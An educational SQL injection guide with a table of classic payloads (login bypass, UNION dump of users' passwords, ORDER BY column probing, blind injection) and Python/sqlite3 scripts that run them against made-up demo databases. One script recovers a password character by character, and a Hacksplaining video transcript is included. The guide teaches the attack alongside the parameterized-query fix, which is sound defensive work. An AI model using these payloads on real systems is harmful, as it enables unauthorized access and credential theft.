
SQL Injection Guide

What is SQL Injection?

SQL Injection is an attack that targets databases through malicious SQL code. It occurs when an application builds an SQL query by concatenating untrusted input (from login forms, search bars, URL parameters, cookies or headers) into the query text, so that specially crafted input is interpreted by the database as SQL commands rather than as data. These commands can read, modify, or delete sensitive data. SQL Injection is one of the most common and dangerous web application vulnerabilities; it results from mixing code and data in the query string (string concatenation instead of parameterized queries), with missing input validation as a contributing factor.
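The mechanism described above, as an added example that is not code from the original page: a Python/sqlite3 login function that builds its query by string concatenation, next to the same lookup written with bound parameters. The in-memory database, its two accounts and their passwords are constructed for the demonstration. The third function reproduces the classic first probe, a single trailing quote, which produces a syntax error only on the concatenating path.

```python
import sqlite3


# Constructed in-memory database standing in for the application's user table
# (demo data only, not a real deployment).
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users (username, password) VALUES (?, ?)",
        [("admin", "correct horse battery staple"), ("alice", "hunter2")],
    )
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str):
    """Vulnerable: the input is pasted into the SQL text, so the database cannot
    tell where the data ends and the query begins. Returns the matched
    username, or None."""
    query = (
        "SELECT username FROM users WHERE username = '" + username
        + "' AND password = '" + password + "'"
    )
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_safe(conn: sqlite3.Connection, username: str, password: str):
    """Hardened: the query text is fixed and the values travel as bound
    parameters, so a quote or comment marker in the input is just data."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


def quote_breaks_query(conn: sqlite3.Connection) -> bool:
    """The classic probe: a single trailing quote. On the vulnerable path it
    leaves an unterminated string literal and the database raises a syntax
    error; on the safe path the same input is simply a wrong password."""
    try:
        login_vulnerable(conn, "alice", "hunter2'")
    except sqlite3.OperationalError:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    payload = "' OR '1'='1' --"
    print("vulnerable:", login_vulnerable(db, payload, "wrong"))  # admin
    print("safe:", login_safe(db, payload, "wrong"))              # None
    print("quote probe:", quote_breaks_query(db))                 # True
```

The payload never needs the real password: on the vulnerable path the OR clause matches every row and the comment marker removes the password check, so the first row (admin) is returned. Comment syntax varies by engine: SQLite and PostgreSQL accept the bare `--` shown here, while MySQL requires a space after `--` (or `#`), so a payload that works in one engine may need adjusting for another.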

Capabilities of SQL Injection

If an attacker successfully performs an SQL Injection, they can gain significant control over the database. This includes the ability to extract sensitive information like usernames, passwords, credit card details, or personal data. In more severe cases, attackers can modify or delete database records, disrupt website functionality, or even gain administrative access to the entire system. Additionally, SQL Injection can be used as a stepping stone for further attacks, such as deploying malware or compromising other parts of the network. The consequences can be devastating, leading to data breaches, financial losses, and reputational damage for the affected organization.

Examples of vulnerable SQL code

SQL Injection examples: this table presents the most common SQL Injection techniques, their descriptions and example SQL code.

Common SQL Injection Examples

Attack string: ' OR '1'='1' --
Description: The attacker enters ' OR '1'='1' -- into the username field of a login form. The OR clause makes the WHERE condition true for every row, and the -- comment marker discards the password check, so authentication is bypassed and the first matching user (often the administrator) is logged in.
Example query: SELECT * FROM users WHERE username = '' OR '1'='1' --' AND password = '';

Attack string: ' UNION SELECT username, password FROM users --
Description: UNION appends the result of a second query to the original one, letting the attacker read data from another table (here users) through a page that was only meant to show products. The injected SELECT must return the same number of columns, with compatible types, as the original query.
Example query: SELECT id, name FROM products WHERE id = '' UNION SELECT username, password FROM users --';

Attack string: ' ORDER BY 5 --
Description: The attacker inputs ' ORDER BY 5 -- to find how many columns the original query returns (the number a UNION payload must match). If the query returns fewer than five columns, the database raises an error, revealing the structure; the attacker raises or lowers the number until the error disappears.
Example query: SELECT id, name FROM products WHERE id = '' ORDER BY 5 --';

Attack string: ' AND 1=1 --
Description: Used for blind injection, when the application shows neither errors nor query results. The attacker injects a condition known to be true (1=1) and one known to be false (1=0) and compares the page's behaviour in the two cases (different content or status; in time-based variants, different response times). Replacing 1=1 with a question about the data (for example, the value of one character of a password) then leaks the data one yes/no answer at a time.
Example query: SELECT * FROM users WHERE username = 'admin' AND password = '' AND 1=1 --';
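The three data-extraction rows of the table (UNION, ORDER BY column counting, and boolean-based blind injection), driven against a constructed sqlite3 version of the products endpoint. This is an added example, not code from the original page; the tables, rows and the password value s3cret are made up for the demonstration. It goes one step beyond the table by turning the 1=1/1=0 oracle into a loop that recovers a password character by character, comparing code points so that no quote characters are needed inside the blind payload.

```python
import sqlite3


# Constructed in-memory database standing in for the page's products and users
# tables (demo data only).
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT)")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO products (name) VALUES (?)", [("widget",), ("gadget",)])
    conn.executemany(
        "INSERT INTO users (username, password) VALUES (?, ?)",
        [("admin", "s3cret"), ("alice", "hunter2")],
    )
    conn.commit()
    return conn


def product_lookup(conn: sqlite3.Connection, product_id: str) -> list:
    """The vulnerable endpoint from the table: the id parameter is concatenated
    straight into the query. Everything below attacks only this function."""
    query = "SELECT id, name FROM products WHERE id = '" + product_id + "'"
    return conn.execute(query).fetchall()


def count_columns(conn: sqlite3.Connection, max_cols: int = 20) -> int:
    """ORDER BY n: raise n until the database complains that the ORDER BY term
    is out of range. The last n that worked is the column count a UNION
    payload must match."""
    for n in range(1, max_cols + 1):
        try:
            product_lookup(conn, "' ORDER BY " + str(n) + " --")
        except sqlite3.OperationalError:
            return n - 1
    return max_cols


def union_dump_users(conn: sqlite3.Connection) -> set:
    """UNION: the empty id matches no product, so every row that comes back is
    from the attacker's second SELECT, rendered in the product columns."""
    rows = product_lookup(conn, "' UNION SELECT username, password FROM users --")
    return {(username, password) for username, password in rows}


def blind_extract_password(conn: sqlite3.Connection, username: str, max_len: int = 64) -> str:
    """Boolean-based blind: the page reveals only whether product 1 came back,
    so each request asks one yes/no question about one character. Comparing
    code points via unicode(substr(...)) keeps quotes out of the payload."""
    recovered = ""
    for pos in range(1, max_len + 1):
        for code in range(32, 127):  # printable ASCII
            payload = (
                "1' AND unicode(substr((SELECT password FROM users WHERE username = '"
                + username + "'), " + str(pos) + ", 1)) = " + str(code) + " --"
            )
            if product_lookup(conn, payload):  # non-empty result: condition held
                recovered += chr(code)
                break
        else:
            break  # no character matched: past the end of the string
    return recovered


if __name__ == "__main__":
    db = make_db()
    print("columns in the original query:", count_columns(db))  # 2
    print("users via UNION:", sorted(union_dump_users(db)))
    print("admin password via blind injection:", blind_extract_password(db, "admin"))  # s3cret
```

The blind loop issues at most 95 requests per character and stops when no code point matches, which is how an attacker learns the string has ended without ever seeing it on the page. Real tools shorten this with a binary search over the code point (unicode(...) > 64, then > 96, and so on), but the oracle is identical.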
Video transcript

Welcome to the Hacksplaining video tutorial series. In this video, we will learn about SQL injection, one of the most common and dangerous methods hackers use to attack your website. [Opens bank website] This is the vulnerable application that we are trying to hack using a SQL injection attack. [Zooms in on logs] Here are the application logs. Watch what happens when we interact with the vulnerable application. First, let's try guessing the password. [Types in password and email] Okay, so guessing the password did not work. Let's try adding a quote character after the password. [Types password again with quote] The application crashed with an unexpected error. What could that mean? The logs show a SQL syntax error. This indicates that the quote character disrupted the query in an unexpected way. [Zooms in on SQL code] This is what the application code looks like behind the scenes. Watch how the SQL code gets built when we enter the login details. Let's enter the password with the trailing quote character once more. [Types in password again] The quote is inserted directly into the SQL string and terminates the query early. This is what causes the syntax error we saw in the logs. This behavior indicates that the application might be vulnerable to SQL injection. Let's try a specifically crafted password. [Types in password] And we are in. [Website logs the user in] We successfully gained access to the application without having to guess the password by using SQL injection. The double dashes caused the database to ignore the rest of the SQL statement, allowing us to be authenticated without having to supply the real password. SQL injection is one of the most prevalent vulnerabilities on the internet. If you only have time to protect against one vulnerability, you should be checking for SQL injection in your codebase. Click on the link to learn how to protect yourself, or move on to the next video.